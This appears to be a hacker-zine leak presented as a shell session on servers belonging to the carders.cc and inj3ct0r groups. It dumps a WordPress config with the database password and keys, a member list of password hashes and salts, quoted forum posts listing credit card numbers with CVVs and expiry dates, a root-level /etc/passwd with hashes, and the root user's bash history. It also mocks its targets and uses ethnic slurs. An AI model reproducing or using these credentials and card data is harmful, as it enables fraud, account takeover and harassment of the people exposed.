dr-xr-x--- 5 cardersblog www 1024 Nov 21 00:18 blog.carders.cc
drwxrwxrwx 2 cardersblog www 512 Nov 2 01:16 temp

$ cd blog.carders.cc

$ ls
total 2928
dr-xr-x--- 5 cardersblog www 1024 Nov 21 00:18 .
drwxr-xr-x 4 cardersblog www 512 Nov 2 01:16 ..
-rw-r--r-- 1 cardersblog www 188 Nov 21 00:18 .htaccess
-r-xr-x--- 1 cardersblog www 397 Aug 27 17:22 index.php
-r-xr-x--- 1 cardersblog www 2683109 Jul 18 16:06 latest.tar.gz
-r-xr-x--- 1 cardersblog www 15410 Aug 27 17:22 license.txt
-r-xr-x--- 1 cardersblog www 9122 Aug 27 17:22 readme.html
-r-xr-x--- 1 cardersblog www 4391 Aug 27 17:22 wp-activate.php
dr-xr-x--- 7 cardersblog www 2560 Jul 18 16:06 wp-admin
-r-xr-x--- 1 cardersblog www 40284 Aug 27 17:23 wp-app.php
-r-xr-x--- 1 cardersblog www 220 Aug 27 17:23 wp-atom.php
-r-xr-x--- 1 cardersblog www 274 Aug 27 17:23 wp-blog-header.php
-r-xr-x--- 1 cardersblog www 3926 Aug 27 17:23 wp-comments-post.php
-r-xr-x--- 1 cardersblog www 238 Aug 27 17:23 wp-commentsrss2.php
-r-xr-x--- 1 cardersblog www 3173 Aug 27 17:23 wp-config-sample.php
-r-xr-x--- 1 cardersblog www 3506 Jul 31 14:20 wp-config.php
dr-xr-x--- 6 cardersblog www 512 Aug 27 18:05 wp-content
-r-xr-x--- 1 cardersblog www 1255 Aug 27 17:23 wp-cron.php
-r-xr-x--- 1 cardersblog www 240 Aug 27 17:23 wp-feed.php
dr-xr-x--- 7 cardersblog www 2560 Jul 18 16:06 wp-includes
-r-xr-x--- 1 cardersblog www 2002 Aug 27 17:23 wp-links-opml.php
-r-xr-x--- 1 cardersblog www 2441 Aug 27 17:23 wp-load.php
-r-xr-x--- 1 cardersblog www 26059 Aug 27 17:23 wp-login.php
-r-xr-x--- 1 cardersblog www 7774 Aug 27 17:23 wp-mail.php
-r-xr-x--- 1 cardersblog www 487 Aug 27 17:23 wp-pass.php
-r-xr-x--- 1 cardersblog www 218 Aug 27 17:23 wp-rdf.php
-r-xr-x--- 1 cardersblog www 316 Aug 27 17:23 wp-register.php
-r-xr-x--- 1 cardersblog www 218 Aug 27 17:23 wp-rss.php
-r-xr-x--- 1 cardersblog www 220 Aug 27 17:23 wp-rss2.php
-r-xr-x--- 1 cardersblog www 9177 Aug 27 17:23 wp-settings.php
-r-xr-x--- 1 cardersblog www 18695 Aug 27 17:23 wp-signup.php
-r-xr-x--- 1 cardersblog www 3702 Aug 27 17:23 wp-trackback.php
-r-xr-x--- 1 cardersblog www 94184 Aug 27 17:23 xmlrpc.php

$ cat wp-config.php
<?php
/**
* The base configurations of the WordPress.
*
* This file has the following configurations: MySQL settings, Table Prefix,
* Secret Keys, WordPress Language, and ABSPATH. You can find more information
* by visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
* wp-config.php} Codex page. You can get the MySQL settings from your web host.
*
* This file is used by the wp-config.php creation script during the
* installation. You don't have to use the web site, you can just copy this file
* to "wp-config.php" and fill in the values.
*
* @package WordPress
*/


// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'carderscc_02');

/** MySQL database username */
define('DB_USER', 'carderscc_02');

/** MySQL database password */
define('DB_PASSWORD', 'UGZf7e6gzugef76t&/gudz376/&$%e3zugdwzgdwdztFzettf6532df');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'Mcpgq1/{n^mP,4naDg;4Y/gdX+J~.(DBLI|y~FJy*+@BDtD=CJr^M$idR[*P vuR');
define('SECURE_AUTH_KEY', '-=q0$7`R?iH}MkK^KHxbxa4)-]OcrG3y2^EVT^fs%6&7-!<v.<__AcgC^_T+$$sM');
define('LOGGED_IN_KEY', 'Sb{c7+Nhb%ao-#ylff|(I{m,fqK5}>/?7m8/r0!,o}+e:eQfZo;7W:h7av[E:0V[');
define('NONCE_KEY', '|R(!,}:(`utsK5k<SJ%:J#b&UR/LxE.50Y9`6:zP;Kj0VVeGWx4(%Guh=+gb^{W6');
define('AUTH_SALT', '|zI ^JtuY-|uB;}I~X~Sn.W[BZ_pX gWA*nFL`SR]b+ bB,LVj7u+Rov|F=*@ DP');
define('SECURE_AUTH_SALT', 'N^]btUNZY-k+|%HkM##`iB2b{pftxG~:WDLwp}a!M+d8Gy.*M?p(]-SQPfZq]+k)');
define('LOGGED_IN_SALT', 'JASsyk1%PQ|!exxL,JB|0or-~zWcx+lv+KpnMH<M<&+Ro=USk--Z:8 #8a!+NkL$');
define('NONCE_SALT', 'yN8`y~ji$4+1)&N3j+KcY*x~n7=vS)Ip;! [>Q0$LoSd=e?X+C]bqBEp5WWbWLSb');

/**#@-*/

/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each a unique
* prefix. Only numbers, letters, and underscores please!
*/

$table_prefix = 'wp_';

/**
* WordPress Localized Language, defaults to English.
*
* Change this to localize WordPress. A corresponding MO file for the chosen
* language must be installed to wp-content/languages. For example, install
* de.mo to wp-content/languages and set WPLANG to 'de' to enable German
* language support.
*/

define ('WPLANG', '');

/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*/

define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');

##


|
__________ |
_ __ _ | | |
/_\ / \ /_\ | | |
put shit =|= | // | =|= | | |
to shit ! \__/ ! | | |
carders.cc _ | | |
___ | ___ //' | | |
[___] | _ :=| |=: __T_||_T__ |p= | |
| ~| | =)_)= | | [__________] | | |
| | | (_( |xXx| \_ _/ | | |
| | | )_) """"" \ / | | |
\___| V | | | | |
| `========, | | | | |
________`. .'_________________| |________|__________lc_|
`. .' (____) \
_| |_... .;;;;;;;;. \
(________);;;; :;;;;;;;;;;:
:::::::' '::::::::' HAPPY NINJA BATHROOM

Team Member Passes:

Vitali:28cf8ccb53f80f7e8fca5e781f2e6424:dusFzU/ZvUe;e@fx\\3>XIgN[yGx9[*:admin@carders.cc
Juri:9475264713e83164de106d099350ff97:pqfgN4x7P)5_}0-E+PsIJ\\=_o1|oV&:daafagafd@dadadagfasg.dsxc
Luigi:13ae8bfbd4fc44302fc6261f58dd583e:.u5//.-K4<b~M[3Ag#|xSIHhmSuKrT:bla@bla.de
acheron:60536586e174bce7aa1fccf6a674f6f6:"
Ru97*G!'*1'{vhs}3Ze4jCnQ8CT=p:
cyberhood:c5ad50f86c6dbbbea072c243b6466a1f:XY4NYQYr:soh.cyberhood@googlemail.com
e0s:86ca341341366d95e5eb02c79d1cfd47:Q\\8NL6Zno+G-}J'n(T?ndQbV{vhcN=:e0s@z1p.biz
M0RPHEUS:fa667b7f92f7cc9f7739bbbbe68f9a9c:E\\T$#=?"hy"g0BD~@giHAtDDj`P0VS:m0rpheus@carders.cc
Mr.Rus:6e3c81779f105c2cb8a5f36261000cc5:x6GX91GTd$D^yn/@U>`u$lm00M3V}h:d397080@lhsdv.com
Poseidon:0c18d81bcfa2845490f75e785f0e2457:BG$vA-%K_X<F8S%-"~fzr8&t(JJV)7:b2926398@lhsdv.com
SILEN0S:a02675626c179834bf1a2545658a9426:5{+!Og}.xKA&$PHo)5nH-DKO_[zK9L:silen0s@ymail.com
slashx:edb36a0c2d7fe71ecabe36152b4ff942:S'I)uhPovr~Y=;/$S=p)k.SFdqw7)P:jobby.cyriac@web.de
Tiberius:03b38fcabea847925ab42d66e8134d1b:GS.XKvwJnhsr[7a9l7E6g+?E><=|nF:tiberiusus@carders.in


You guys dont get it, do you? We told you to fuck off and still you
did not listen. We are not sorry for doing it again. You deserve it.

____________________________________________________|_._._._._._._._,
\___________________________________________________|_|_|_|_|_|_|_|_|
! ~ inj3ct0r ~

#`````````` ___ ____ ____
#````______/```\__//```\__/____\
#``_/```\_/``:```````````//____\
#`/|``````:``:``..``````/````````\ W A R N I N G !!! DISCOVERED LAMER O_o
#|`|`````::`````::``````\````````/
#|`|`````:|`````||`````\`\______/
#|`|`````||`````||``````|\``/``|
#`\|`````||`````||``````|```/`|`\ 1) maybe you were wrong address, go Inj3ct0r.com
#``|`````||`````||``````|``/`/_\`\
#``|`___`||`___`||``````|`/``/````\
#```\_-_/``\_-_/`|`____`|/__/``````\
#````````````````_\_--_/````\`````/ 2) Or you are not wrong address, then Fuck Off!
#```````````````/____```````````/
#``````````````/`````\`````````/
#``````````````\______\_______/

Attention. This ridiculous banner is *not* part of our zine. In fact
it is inj3ct0r's 404 page. We concluded that this banner perfectly
reflects their retardedness. Their knowledge about security is on the
same level as their ability to speak proper english. For those who
don't know: inj3ct0r is a clone of the old milw0rm project,
administered by some morons called "
r0073r", "Sid3^effects" and "L0rd
CrusAd3r". They are not only an exploit-db, but also an arrogant
community of retarded turks and arabs which tell you how you to write
your stupid Perl SQL-Injection exploit.

All their attention whoring about how they hacked Facebook was driving
us insane and all their moaning about how they have problems with the
law was just too ridiculous for us to let them continue existing.
Actually we did not find out what kind of law problems they actually
had. We did however discover how stupid these kids are and what crap
they are talking about in their private forum area's. Check it out:

-------------
-0day 31337 privat Area
-10-24-2010, 05:08 PM Post by KnocKout:
-
-0-Day Credit Cards | Part 2(Only 31337 Prv.)-
-
-Hi My Brothers..
-
-14367 4454-5454-5454-5445 1 232 12-2012
-14375 5257-9555-0001-0933 1 082 03-2013 ADVANTAGE
-14376 5492-9495-5876-7382 1 280 01-2013 BONUS
-14391 5437-7122-6415-1343 1 334 07-2012 MAXЭMUM
-14392 5437-7122-6415-1343 1 334 07-2012 MAXЭMUM
--------------
-
-0day 31337 privat Area
-10-17-2010, 04:36 PM Post by KnocKout:
-
-Default => Rapid,Hotfile,CC Requests..
-
-hi my brothers,
-RapidShare, Hotfile Premium and Credit Card. Requests..
-
-Please indicate your requests here, and I will send Pm..
--------------

Not only they are sharing CC's, they also think of themselves as the
best hackerz on the planet. Here is how they talk about exploit-db and
offsec:

-------------
-0day 31337 privat Area:
-07-19-2010, 10:05 PM Post by SeeMe:
-
-guys, a bind shell have been sent to offsec server and enforced the regarding ports to be open
-
-Port State Service Reason Product Version Extra info
-22 tcp open ssh syn-ack OpenSSH 5.4 protocol 2.0
-80 tcp open http syn-ack Apache httpd 2.2.15 (Fedora)
-301 tcp filtered unknown no-response
-443 tcp open https syn-ack
-1072 tcp filtered unknown no-response
-1087 tcp filtered unknown no-response
-1100 tcp filtered unknown no-response
-1111 tcp filtered unknown no-response
-1117 tcp filtered unknown no-response
-1443 tcp filtered ies-lm no-response
-1718 tcp filtered unknown no-response
-1720 tcp filtered H.323/Q.931 no-response
-1900 tcp filtered upnp no-response
-2000 tcp filtered cisco-sccp no-response
-2041 tcp filtered interbase no-response
-2046 tcp filtered sdfunc no-response
-2382 tcp filtered ms-olap3 no-response
-3017 tcp filtered unknown no-response
-4129 tcp filtered unknown no-response
-4900 tcp filtered unknown no-response
-5060 tcp filtered sip admin-prohibited
-5555 tcp filtered freeciv no-response
-5560 tcp filtered isqlplus no-response
-6669 tcp filtered irc no-response
-8007 tcp filtered ajp12 no-response
-9102 tcp filtered jetdirect no-response
-10000 tcp open snet-sensor-mgmt syn-ack
-44443 tcp filtered coldfusion-auth no-response
-
-but I just can't connect back to it
-
-any idea!
-------------
-
-07-21-2010, 10:10 PM Post by SeeMe:
-
-This is a new technology for me how to gain credentials over HTTP TRACE and TRACK
-when it's enable on a webserver
-
-The TRACE/TRACK method was enabled on the server listed below:
-
-http://www.offensive-security.com:80/
-
-[PHP]http://www.offensive-security.com/wp-content/themes/infocus/lib/scripts/prettyPhoto/js/jquery.prettyPhoto.js?ver=./2.9.2%20HTTP/1.1[/PHP]
-
-
-could gain view info from the link above
-------------
-
-07-30-2010, 12:26 AM Post by SeeMe:
-
-http://mobile.backtrack-linux.org/
-
-exploited for good and not sure that will be able to back it up
-
-and I'm still heading for the main both sites, offsec.com and exploit-db
-
-After one month into the desert I'll be back infront of my computer on 15th of Agu
-
-and I'll prepare for a globel war
-------------


They are calling exploit-db "
lamers-db" yet they don't see who the
real lamers are. Hardly surprising that the inj3ct0r team did not
manage their box themselves and instead gave their work to some fat
guy called "
asker". But since he left his box rot with some half
updated shit, it was a child's play to tap in and root.

$ uname -a
Linux wateam 2.6.26-2-686 #1 SMP Thu Sep 16 19:35:51 UTC 2010 i686 GNU/Linux

$ id
uid=0(root) gid=0(root) groups=0(root)

$ cd /

$ ls -la
total 540
drwxr-xr-x 22 root root 1024 Oct 3 22:04 .
drwxr-xr-x 22 root root 1024 Oct 3 22:04 ..
drwxr-xr-x 2 root root 3072 Oct 3 21:09 bin
drwxr-xr-x 4 root root 1024 Oct 3 21:10 boot
drwxr-xr-x 15 root root 3460 Oct 15 15:19 dev
drwxr-xr-x 68 root root 6144 Oct 20 17:44 etc
drwxr-x--x 37 root root 4096 Oct 20 17:45 home
drwxr-xr-x 2 root root 1024 Nov 3 2007 initrd
lrwxrwxrwx 1 root root 28 Jul 29 11:28 initrd.img -> boot/initrd.img-2.6.26-2-686
lrwxrwxrwx 1 root root 28 Nov 24 2008 initrd.img.old -> boot/initrd.img-2.6.18-6-686
drwxr-xr-x 12 root root 7168 Oct 3 21:09 lib
drwx------ 2 root root 12288 Nov 3 2007 lost+found
drwxr-xr-x 2 root root 1024 Nov 3 2007 media
drwxr-xr-x 2 root root 1024 Oct 28 2006 mnt
drwxr-xr-x 2 root root 1024 Nov 3 2007 opt
dr-xr-xr-x 154 root root 0 Oct 15 15:18 proc
drwxr-x--- 7 root root 1024 Oct 15 17:27 root
drwxr-xr-x 2 root root 6144 Oct 3 21:09 sbin
drwxr-xr-x 2 root root 1024 Sep 16 2008 selinux
drwxr-xr-x 2 root root 1024 Nov 3 2007 srv
drwxr-xr-x 11 root root 0 Oct 15 15:18 sys
drwxrwxrwt 7 root root 492544 Oct 24 19:03 tmp
drwxr-xr-x 12 root root 4096 Jul 29 11:22 usr
drwxr-xr-x 15 root root 4096 Oct 29 2009 var
lrwxrwxrwx 1 root root 25 Jul 29 11:28 vmlinuz -> boot/vmlinuz-2.6.26-2-686
lrwxrwxrwx 1 root root 25 Nov 24 2008 vmlinuz.old -> boot/vmlinuz-2.6.18-6-686

$ cat /etc/passwd
root:1NMGwkEq76.BsjeYGuM106fIjuU.RS/:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/bin/sh
bin:*:2:2:bin:/bin:/bin/sh
sys:*:3:3:sys:/dev:/bin/sh
sync:*:4:65534:sync:/bin:/bin/sync
games:*:5:60:games:/usr/games:/bin/sh
man:*:6:12:man:/var/cache/man:/bin/sh
lp:*:7:7:lp:/var/spool/lpd:/bin/sh
mail:*:8:8:mail:/var/mail:/bin/sh
news:*:9:9:news:/var/spool/news:/bin/sh
uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:*:13:13:proxy:/bin:/bin/sh
www-data:*:33:33:www-data:/var/www:/bin/sh
backup:*:34:34:backup:/var/backups:/bin/sh
list:*:38:38:Mailing List Manager:/var/list:/bin/sh
irc:*:39:39:ircd:/var/run/ircd:/bin/sh
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:*:65534:65534:nobody:/nonexistent:/bin/sh
mysql:!:100:102:MySQL Server,,,:/var/lib/mysql:/bin/false
proftpd:!:101:65534::/var/run/proftpd:/bin/false
ftp:!:102:65534::/home/ftp:/bin/false
sshd:!:103:65534::/var/run/sshd:/usr/sbin/nologin
Debian-exim:!:104:104::/var/spool/exim4:/bin/false
krivopustov:1V5RSW94dbZ3zwhsovKB4V5hHgvLLF/:1002:1002:,,,:/home/krivopustov:/bin/bash
volosovets:1NMLjMXqhFedJgnjw0uBwdQ2jRFqbG0:1007:1007:,,,:/home/volosovets:/bin/bash
wapper:1c1iEEB/k591mvgQk8a5mbsZmPwY8Q1:1008:1008:,,,:/home/wapper:/bin/bash
jaguar:1NOCfawFB/TD6X9.hEmN9Mn0kg1G.s1:1011:1011:,,,:/home/jaguar:/bin/bash
postfix:!:105:106::/var/spool/postfix:/bin/false
popa3d:!:106:109::/var/lib/popa3d:/bin/false
asmer:1O2E8f0enwpuZw37FkNoe0MNSktFTd.:1012:1012:,,,:/home/asmer:/bin/bash
wateam:1cewmdLFokkbiLeLlHrL2NJnPdqpnR/:1013:1013:,,,:/home/wateam:/bin/bash
silentwarrior:1aDOI9IqA5BrDw1EBfH4Afm5TYRNe//:1014:1014:,,,:/home/silentwarrior:/bin/bash
snt-nmu:1NZO0tdC.reQ07bby/FttmOEZLF7ys1:1015:1015:,,,:/home/snt-nmu:/bin/bash
nmusic:1tXoV.I8o28zdaeu.Ukrde4hYikNtG0:1020:1020:,,,:/home/nmusic:/bin/bash
mydns:1C8cYgZB0p9rtxWwyXoiJiK4QUa.sJ/:1021:1021:,,,:/home/mydns:/bin/bash
conference-sidelnikov:1ghcMsPcI9j5ok3AbEf5qGI.h7Mq7O.:1016:1016:,,,:/home/conference-sidelnikov:/bin/bash
lena:153QNshcJB/5PK1r8L/60LAOJCwzik1:1000:1000:,,,:/home/lena:/bin/bash
vakulenko:1g6y9T9/TWWr1s.FTZKwuKj2qwbYxg1:1027:1027:,,,:/home/vakulenko:/bin/bash
xanavi:1V4L5wKgWog9Kl4lV0uwvG0/0TyHyq1:1001:1001:,,,:/home/xanavi:/bin/bash
lalizas:1dzDm0j2v0fE06VyK89b/Pfm6ePylC0:1003:1003:,,,:/home/lalizas:/bin/bash
r0otech0inj3ct0rr00t0ro0t3r:1Yu.4UMOxpFH639CL8260qyjYwKgbk1:1006:1034:,,,:/home/r0otech0inj3ct0rr00t0ro0t3r:/bin/bash
n3tw0rkTeRr0r15M:1u1DDFCJnGFd0M07E5kahW3t0N1yYD1:1010:1034:,,,:/home/n3tw0rkTeRr0r15M:/bin/bash
pma:1cDULb4Zqt4ksmqqFe9MIQSBLrz3lO.:1019:1019:,,,:/home/pma:/bin/bash
valiant:1QXeOzsOyaW8gT6JknX1Ssa.A3ef8g/:1024:1024:,,,:/home/valiant:/bin/bash
cherrybikes:11MJaagK8rJ6BQ9pxLdZjU.WhIGG4r0:1031:1031:,,,:/home/cherrybikes:/bin/bash
natasha:1NmwIlomO.Y00wBbg0eGE9dqOP4qis/:1032:1032:,,,:/home/natasha:/bin/bash
ntp:!:107:107::/home/ntp:/bin/false
chupik:1gpJL5HGbm7EeCor46OOs8L0y1L7mH1:1005:1033:,,,:/home/chupik:/bin/bash
sweethome:1x4j1/bzV8Vf5fHBfeSp3BgMUNojJf.:1004:1035:,,,:/home/sweethome:/bin/bash
sweethome-lena:1uZFdDmVbAHGDtbBEGs1jjYYtvVONN1:1009:1036:,,,:/home/sweethome-lena:/bin/bash
skyweb:1.wiXZLSKG4F6WGVdgKDIorjx77.ZD1:1028:1037:,,,:/home/skyweb:/bin/bash
yslivka:1RNlOuljj5wZ8hdD0kSDe2wPMREdBu1:1029:1038:,,,:/home/yslivka:/bin/bash
tmv-nmu:168k122DrZFKqjXrwYSjjdMSKzzVDy.:1030:1039:,,,:/home/tmv-nmu:/bin/bash
web-ghost:1wuuXL1mSrDxVErzeO0KuoZKu8mJBj1:1018:1018:,,,:/home/web-ghost:/bin/bash
tiler-andrey:1RGxMA/cQA090Sx/VTTctkkHFZEs7I1:1035:1041:,,,:/home/tiler-andrey:/bin/bash
sunsanych:1RaR9SD58m80b/DVZEHYg6Ik4SKYWJ.:1036:1042:,,,:/home/sunsanych:/bin/bash
ra5ta:1nkELVbaHtGqTJl29kSFbjlDs1Yy3U0:1037:1043:,,,:/home/ra5ta:/bin/bash
magicgarden:1.MBu1KaRXkR2bihB8ZXnqfHbqQ5bm0:1038:1044:,,,:/home/magicgarden:/bin/bash
hochumogu:1MwCkIsEmO0Xe/BV8PndFgE9sIMF/Q1:1025:1025:,,,:/home/hochumogu:/bin/bash
libuuid:!:108:110::/var/lib/libuuid:/bin/sh
steelnews:1ajGgNpodz1jrN1JlmcmLmms5Wf7kn0:1017:1017:,,,:/home/steelnews:/bin/bash
vonline:1sk1MRD8BW3jlEKEYUNCtJ3d0gY1bh0:1022:1045:,,,:/home/vonline:/bin/bash
dyquem:1JkATmEyg3XnBHIeGOEstzP2vmes4s1:1039:1046:,,,:/home/dyquem:/bin/bash
vika:1bkhqsMEjgj7H.DzRJLoGj64SksjzM1:1040:1047:,,,:/home/vika:/bin/bash
tiler-dima:1jKtO0mArwxlajKK9/v4yFHF1mu9/g0:1026:1040:,,,:/home/tiler-dima:/bin/bash
mazafaka:1LSjx2PhiI7OlLVcMSEz2GJDUiwBmg.:1034:1034:,,,:/home/mazafaka:/bin/bash
tiler:1Qa4oVdJmYjcu6Ccq/7AqTEA6V2GIT1:1023:1023:,,,:/home/tiler:/bin/bash

$ cd /root

$ ls -la
total 14
drwxr-x--- 7 root root 1024 Oct 15 17:27 .
drwxr-xr-x 22 root root 1024 Oct 3 22:04 ..
drwx------ 2 root root 1024 Aug 20 02:09 .aptitude
-rw------- 1 root root 6748 Oct 22 22:28 .bash_history
drwxr-xr-x 2 root root 1024 Aug 20 02:09 .debtags
drwxr-xr-x 2 root root 1024 Oct 15 17:29 .mc
drwxr-xr-x 2 root root 1024 Aug 2 21:39 scripts
drwxr-xr-x 2 root root 1024 Oct 15 16:51 test

$ cat .bash_history
apache2 -k restart
cd /home/maza*/h*
ls -al
nano index.html
ls -al
nano index.html
exit
a2ensite mazafaka.in
apache2 -k restart
edquota -g inj3ct0r
quotatool
quotatool -g inj3ct0r -bl 512M /home
edquota inj3ct0r
edquota -g inj3ct0r
exit
cd /home/n*
ls -al
cd ht*
ls -al
nano index.php
ls -al
cd t*dark
ls -al
cd gra*
ls -al
cd ..
du
cd ..
ls -al
du tech_dark
du tech_blue
du tech_white
ls -al
cd cpstyles
ls -al
du
du -h
cd .
cd..
cd ..
du -h *dark
cd tech_dark
ls -al
cd misc
ls -al
cd ..
cd ..
find ./ -name *.tpl
find ./ -name *.htm
find ./ -name *.htm*
find ./ -name *.tpl
cd ..
cd ht*
cd gree*
ls -al
du -h
cd pools
cd pools
cd polls
ls -al
cd ..
cd regimage
ls -la
cd ../..
nano index.php
ls -al
rm ya*.txt
rm google*
cd incl*
ls -al
cd ..
ls -al
cd green*
ls -al
cd editor
ls -al
cd ..
cd attach
ls -al
cd ..
cd ..
ls -al
find ./ -name *.css
cd cp*
ls -al
cd vB*
ls -al
cd ..
ls -al
du -h
cd ..
find ./ -name *.css
nano ./tech_white/tech_white.css
exit
cd /etc/
nano crontab
exit
cd /var/
ls -la
cd mail
ls -al
cd /etc/postfix
nano virtual
postmap virtual
nano aliases
defrag
ls -al
exit
cd /var/mail
ls -al
rm tiler-*
ls -la
exit
exit
passwd tiler
passwd tiler
exit
cd /etc/
nano passwd
exit
passwd lena
exit
sasldbpasswd2
saslpasswd2
saslpasswd2 -c lena
sasllistusers2
sasldblistusers2
saslpasswd2
saslpasswd2 -d sweethome-lena
exit
saslpasswd2 -c sweethome-lena
passwd sweethome-lena
exit
passwd tiler
exit
cd /home/snt*
ls -al
cd ht*
ls -al
nano index.php
exit
cd /home/sn*/h*/
nano index.php
cd /home/wa*/h*
ls -al
nano index.php
cd /home/wateam
cd h*
nano index.html
exit
cd /home
ls -al
cd lena
ls -al
cd htdocs
ls -al
cd ..
cd ..
rm lena -R
cd mydns
ls -al
cd ..
rmdir mydns
cd temp
ls -al
du -h
rm *
cd ..
ls -al
cd lo*
ls -al
cd ..
rmdir lost+found
exit
cd /home/wateam
ls -al
cd other
ls -al
cd ../htdocs
nano index.html
exit
cd /home/n*
cd htdocs
ls -al
cd inc*
ls -al
nano config.php
exit
cd /etc/apache2
nano apache2.conf
nano

  
vhosts.conf

nano apache2.conf
apache2 -k restart
nano apache2.conf
apache2 -k restart
cd /mo*e
cd mo*e
nano fcgi*
cd ..
nano vhosts
nano vhosts
cd /var/lib/log*
ls -al
cat status
cat status|more
nano status
rm status
logrotate
logrotate -f /etc/logrotate.conf
ls -al
nano status
ls -al
df -h
cd /var/log
ls -al
exit
cd /home/
tar --help
tar
cls
tar --help|more
tar --help|more
tar --help|more
cd cd tiler
ls -al
cd tiler
ls -al
tar cvzf tiler.tar
ls -al
cd ht*
ls -al
tar cvzf tiler.tar
tar --help|more
man tar
ls -akl
ls -al
cd ..
tar -zcvf tiler.tar htdocs
ls -la
nano /etc/passwd
init 6
exit
ren
rename
mkdir test
cd test
touch 1d_5.jpg
touch 1d_7.JPG
touch 1.jpg
touch 1d7.JPg
ls -al
rename
rename --help
man rename
rename -n (.*)\.JPG 1.jpg
rename -n '/.*\.JPG/' *.jpg
rename -n /.*\.JPG/ *.jpg
rename -n /.*\.JPG/ *
rename -nv /.*\.JPG/ *
ls -al
rename -nv s/.*\.JPG/ *
rename -nv /.*\.JPG/ *
rename -nv /.*\.JPG/ *.JPG
rename -nv /.*\.JPG/ *.JPG
rename -nv '/.*\.JPG/' *.JPG
rename -nv '/.+\.JPG/' *.JPG
rename -nv '/.+\.JPG/' *.JPG
rename -nv . *
rename -nv /./ *
rename -nv /./ *.JPG
rename -n 'y/A-Z/a-z/' *
rename -n '/A-Z/a-z/' *
rename -n /\.JPG/ *
rename -n /\.JPG/ *.JPG
rename -n '\.JPG' *.JPG
rename -n 's/\.JPG/' *.JPG
rename -n 's/\.JPG//' *.JPG
rename -n 's/\.JPG//' *.JPG
rename -n '/\.JPG//' *.JPG
rename -n '/\.JPG//' *.JPG
rename -n '/\.JPG/' *.JPG
rename -n 's/\.JPG//' *.JPG
ls -al
mv 1.jpg ONE.JPG
ls -la
rename -n 's/\.JPG//' *.JPG
rename -n 's/\.JPG//' **
rename -n 's/\.JPG//' *.*
rename -n 's/\.JPG//'
rename -n 's/\.JPG//' *.JPG
rename -n 's/\.JPG//' *E.JPG
rename -n 's/\.JPG//' *.
man rename
rename -nv s\.jpg// *.JPG
rename -nv s\./jpg// *.JPG
rename -nv s\./jpg// *.JPG
man rename
rename -nv .JPG .jpg *
rename -nv /.JPG .jpg/ *
rename -nv /\.JPG \.jpg/ *
rename -nv /\.JPG \.jpg/ *rename .bak .txt *.bak
rename .bak .txt *.bak
rename -nv s/\.JPG/\.jpg/ *
rename -nv s/\.JPG/\.jpg/ *
rename -nv s/\.JPG/\.jpg/ *
rename -nv s/\.JPG/\./ *
rename -nv s/\.JPG/\.jpg/ *
cd /home/
cd tiler
cd ht*
cd up*
cd ima*
ls -al
rename s/\.JPG/\.jpg/ *
ls -al
ls -al
rename s/\.JPG/\.jpg/ *
rename -nv s/\.JPG/\.jpg/ *
rename -nv s/\.JPG/\.jpg/ *|more
rename -nv s/\.JPG/\.jpg/ *|more
mc
cd ..
cd ..
cd ..
ls -al
tar zcvf tiler.tar.gz htdocs
cd ht*
rmdir uploaded -R
rm uploaded -R
exit
cd /home/r0*'
cd /home/r0*
cd h*
nano index.php
cd ../../snt*
cd ht*
nano index.php
cd ../../n*
cd ht*
ls -al
nano index.php
ls -al
find / - name *.tpl
find ./ -name *.tpl
find ./ -name template
find ./ -name tp
find ./ -name tem
find ./ -name them
ls -al
grep --help
grep -rl "sweethome" ./
grep -rl "tiler" ./
cd ../../
ls -al
cd sweethome
ls -al
cd htdocs
ls -al
nano tem*
cd tem*
cd blocks
ls -al
nano left.php
nano left.php
cd /home/tiler/ht*
ls -al
cd .././
cd ../
ls -al
cd sn*
cd ht*
nano index.php
cd ../../
cd r0*/h*
nano index.php
cd ../../wa*
cd ../wateam
cd ht*
nani index.html
nani index.htm
nani index.php
ls -al
nano index.html
exit
/etc/init.d/ssh_brute stop
/etc/init.d/ssh_brute start
cd /var/log/pro*
ls -al
tail -n 100 proftpd.log
tail -n 100 proftpd.log
tail -n 100 proftpd.log
tail -n 100 proftpd.log
tail -n 100 proftpd.log
tail -n 100 proftpd.log
tail -n 100 proftpd.log
tail -n 100 proftpd.log
tail -n 100 proftpd.log
tail -n 100 proftpd.log
tail -n 100 proftpd.log
tail -n 100 proftpd.log
tail -n 100 proftpd.log
tail -n 100 proftpd.log
tail -n 100 proftpd.log
tail -n 100 proftpd.log|grep 18
tail -n 100 proftpd.log|grep 18
tail -n 100 proftpd.log|grep 18
tail -n 100 proftpd.log|grep 18
exit
cd /home/tiler
ls -al
tar zcvf 18.10.2010.tar.gz htdocs
ls -al
exit
cd /var/log
cd mail
ls -al
cat mail.log|grep stempher
cat mail.log|grep "Oct 19 12"
cat mail.log|grep "Oct 19 12"|more
exit
adduser sbs
adduser sbs
deluser sbs
adduser sbs
cd /home/sbs
cd /etc/apache2
ls -al
cd si*e
ls -al
cp yslivka.org.ua sbs-ua.com
nano sbs-ua.com
a2ensite sbs-ua.com
cd /etc
exit
apache2 -k restart
exit
cd /etc/apache2
cd si*e
ls -al
nano asmerok.org.ua
apache2 -k restart
adduser www-data sbs
adduser www-data sbs
apache2 -k restart
exit
cd /etc/ssh*
ls -al
cd sshd*
nano sshd*
exit
/etc/init.d/ssh restart
exit
cd /etc/apache2
cd si*e
nano sbs-ua.com
apache2 -k restart
exit
unrar
urar
